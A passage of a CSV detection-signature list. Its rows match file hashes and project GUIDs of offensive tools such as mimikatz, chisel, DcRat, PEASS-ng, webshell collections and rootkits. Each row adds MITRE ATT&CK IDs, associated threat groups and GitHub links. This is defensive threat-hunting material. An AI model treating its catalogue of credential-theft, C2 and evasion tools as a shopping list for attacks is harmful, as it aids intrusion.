Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","20791" "*024d01776b9b5d42efb6115f59ec51addab5e64db969f3ec9a564f242bf702f2*",".{0,1000}024d01776b9b5d42efb6115f59ec51addab5e64db969f3ec9a564f242bf702f2.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","20792" "*025280A3-24F7-4C55-9B5E-D08124A52546*",".{0,1000}025280A3\-24F7\-4C55\-9B5E\-D08124A52546.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","#GUIDproject","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","20794" "*0253413ed641b86b351fc3b9355715f7d62c74bc1d954dd0c9cff13693535a82*",".{0,1000}0253413ed641b86b351fc3b9355715f7d62c74bc1d954dd0c9cff13693535a82.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux 
#windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20795" "*0254ddc9bb3533d56c1e0643d587088624faf2bf8eb4dd8f6d37c963cca75205*",".{0,1000}0254ddc9bb3533d56c1e0643d587088624faf2bf8eb4dd8f6d37c963cca75205.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","20796" "*02551940f2ee1ddd51aac5de97a84b5ce7a9fbec1be8f2c5018b2f7e09f7e1e9*",".{0,1000}02551940f2ee1ddd51aac5de97a84b5ce7a9fbec1be8f2c5018b2f7e09f7e1e9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20797" "*0257fba1e0ecd10af76bf252a76f03656f194bb2173f8555dabd86a03c7df621*",".{0,1000}0257fba1e0ecd10af76bf252a76f03656f194bb2173f8555dabd86a03c7df621.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20798" "*0259d41720f7084716a3b2bbe34ac6d3021224420f81a4e839b0b3401e5ef29f*",".{0,1000}0259d41720f7084716a3b2bbe34ac6d3021224420f81a4e839b0b3401e5ef29f.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral 
Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","20799" "*025c793845527566066af18172b76c87b234ad7306040cdf734ec516a6afda1c*",".{0,1000}025c793845527566066af18172b76c87b234ad7306040cdf734ec516a6afda1c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20801" "*026389a44b0e1797d97afd0c333f778fe8c066e9edf4c0b847872263a27451f0*",".{0,1000}026389a44b0e1797d97afd0c333f778fe8c066e9edf4c0b847872263a27451f0.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20803" "*0266d99789720ec1a83a397127c478885b3f3ff02026a3fb06d3a10e523a9cc0*",".{0,1000}0266d99789720ec1a83a397127c478885b3f3ff02026a3fb06d3a10e523a9cc0.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20804" "*0269fd0001afa23edd1206484dccce04b49e0ec0daa65234126a6f3c42f35a46*",".{0,1000}0269fd0001afa23edd1206484dccce04b49e0ec0daa65234126a6f3c42f35a46.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - 
CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","0","#filehash","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","20805" "*026a94e75aa94054623b3e2d617c8c59ce6e63edce3e739cbe94283a1eca394a*",".{0,1000}026a94e75aa94054623b3e2d617c8c59ce6e63edce3e739cbe94283a1eca394a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20806" "*026db4159e7e36e00fdcef1e29f73b40030a3572*",".{0,1000}026db4159e7e36e00fdcef1e29f73b40030a3572.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","20807" "*026e9623fd5e6f9ea9adb0dc47ec800db36bbcb5080e8e2bb77d47049c638b16*",".{0,1000}026e9623fd5e6f9ea9adb0dc47ec800db36bbcb5080e8e2bb77d47049c638b16.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. 
Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","20808" "*02761d4f88230378f0abb1b33c505e497d07c4c160e46a0a7d487870869154f2*",".{0,1000}02761d4f88230378f0abb1b33c505e497d07c4c160e46a0a7d487870869154f2.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","20811" "*027954d28fd8fa98e06be72439e5a987d2d280a8e3c8d2ab91a4a55d39cbe846*",".{0,1000}027954d28fd8fa98e06be72439e5a987d2d280a8e3c8d2ab91a4a55d39cbe846.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20813" "*027bf95a524ee9daf472869e548c9221b16d4a5230de187e5ae9ba9a9e98cfba*",".{0,1000}027bf95a524ee9daf472869e548c9221b16d4a5230de187e5ae9ba9a9e98cfba.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","20815" "*027FAC75-3FDB-4044-8DD0-BC297BD4C461*",".{0,1000}027FAC75\-3FDB\-4044\-8DD0\-BC297BD4C461.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","20817" "*027FAC75-3FDB-4044-8DD0-BC297BD4C461*",".{0,1000}027FAC75\-3FDB\-4044\-8DD0\-BC297BD4C461.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","20818" 
"*027FAC75-3FDB-4044-8DD0-BC297BD4C461*",".{0,1000}027FAC75\-3FDB\-4044\-8DD0\-BC297BD4C461.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","20819" "*027FAC75-3FDB-4044-8DD0-BC297BD4C461*",".{0,1000}027FAC75\-3FDB\-4044\-8DD0\-BC297BD4C461.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","20820" "*027FAC75-3FDB-4044-8DD0-BC297BD4C461*",".{0,1000}027FAC75\-3FDB\-4044\-8DD0\-BC297BD4C461.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","20821" "*028648d9410d8aaf65b7cb4999999947b55f8aa4db3ec24ff82b601b77ecc335*",".{0,1000}028648d9410d8aaf65b7cb4999999947b55f8aa4db3ec24ff82b601b77ecc335.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","20823" 
"*0286bd5f-1a56-4251-8758-adb0338d4e98*",".{0,1000}0286bd5f\-1a56\-4251\-8758\-adb0338d4e98.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#GUIDproject","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","20824" "*02947e9a3759fea352b81bdf4390b6dfb5ea5823ed4836e1e7a46e5d9b65263c*",".{0,1000}02947e9a3759fea352b81bdf4390b6dfb5ea5823ed4836e1e7a46e5d9b65263c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20825" "*02948DD6-47BD-4C82-9B4B-78931DB23B8A*",".{0,1000}02948DD6\-47BD\-4C82\-9B4B\-78931DB23B8A.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","20826" 
"*029558a5c334d67b479885be83f0e0dc856189d1de14ad1d4136b7d451498daa*",".{0,1000}029558a5c334d67b479885be83f0e0dc856189d1de14ad1d4136b7d451498daa.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","20827" "*0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5*",".{0,1000}0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#filehash","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","20828" "*029fa62f9ee4ffbf98d5b187c658db8ecff38ccdc4dc5a8c37890446a33d1a23*",".{0,1000}029fa62f9ee4ffbf98d5b187c658db8ecff38ccdc4dc5a8c37890446a33d1a23.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","#filehash","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","20830" "*02ac483d126c4b08d880cfab52f1904323006b4778f43f536bb83bb38c2a9f2e*",".{0,1000}02ac483d126c4b08d880cfab52f1904323006b4778f43f536bb83bb38c2a9f2e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20832" 
"*02b25adcd66eb449917f1d59d0c0f802baec912f2f98293f0612e30b95927591*",".{0,1000}02b25adcd66eb449917f1d59d0c0f802baec912f2f98293f0612e30b95927591.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20833" "*02bb96ce1e3948500c9bfc51d925ca2f59a32a1ae9e4d871c6913988bdba35f6*",".{0,1000}02bb96ce1e3948500c9bfc51d925ca2f59a32a1ae9e4d871c6913988bdba35f6.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20836" "*02bb96ce1e3948500c9bfc51d925ca2f59a32a1ae9e4d871c6913988bdba35f6*",".{0,1000}02bb96ce1e3948500c9bfc51d925ca2f59a32a1ae9e4d871c6913988bdba35f6.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - 
T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20837" "*02c66658356f846b14ef575627bb2ebbd65b0da6bb092470f95ea59362ee8c14*",".{0,1000}02c66658356f846b14ef575627bb2ebbd65b0da6bb092470f95ea59362ee8c14.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20838" "*02c6a29b238259a0246547ae5555099e9b64408fe28fec1402e1f31a9ab83e88*",".{0,1000}02c6a29b238259a0246547ae5555099e9b64408fe28fec1402e1f31a9ab83e88.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","20839" "*02cbcc3c3b79a7f81165838af0605d7238e8c5ad7a6e2d59d7795c1f137fe7a4*",".{0,1000}02cbcc3c3b79a7f81165838af0605d7238e8c5ad7a6e2d59d7795c1f137fe7a4.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","20840" "*02e559998bedab5437014f159a3c71a86fd94dc5388cfcddf5375ebc75a6f588*",".{0,1000}02e559998bedab5437014f159a3c71a86fd94dc5388cfcddf5375ebc75a6f588.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","20845" "*02ee841b1c0ff20dd6b50afd104fad2103b1736872173a1b2b036071f8219db1*",".{0,1000}02ee841b1c0ff20dd6b50afd104fad2103b1736872173a1b2b036071f8219db1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20847" 
"*02EF15C0-BA19-4115-BB7F-F5B04F7087FE*",".{0,1000}02EF15C0\-BA19\-4115\-BB7F\-F5B04F7087FE.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","20848" "*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20849" "*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20850" "*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20851" "*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20852" "*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20853" "*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20854" "*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - 
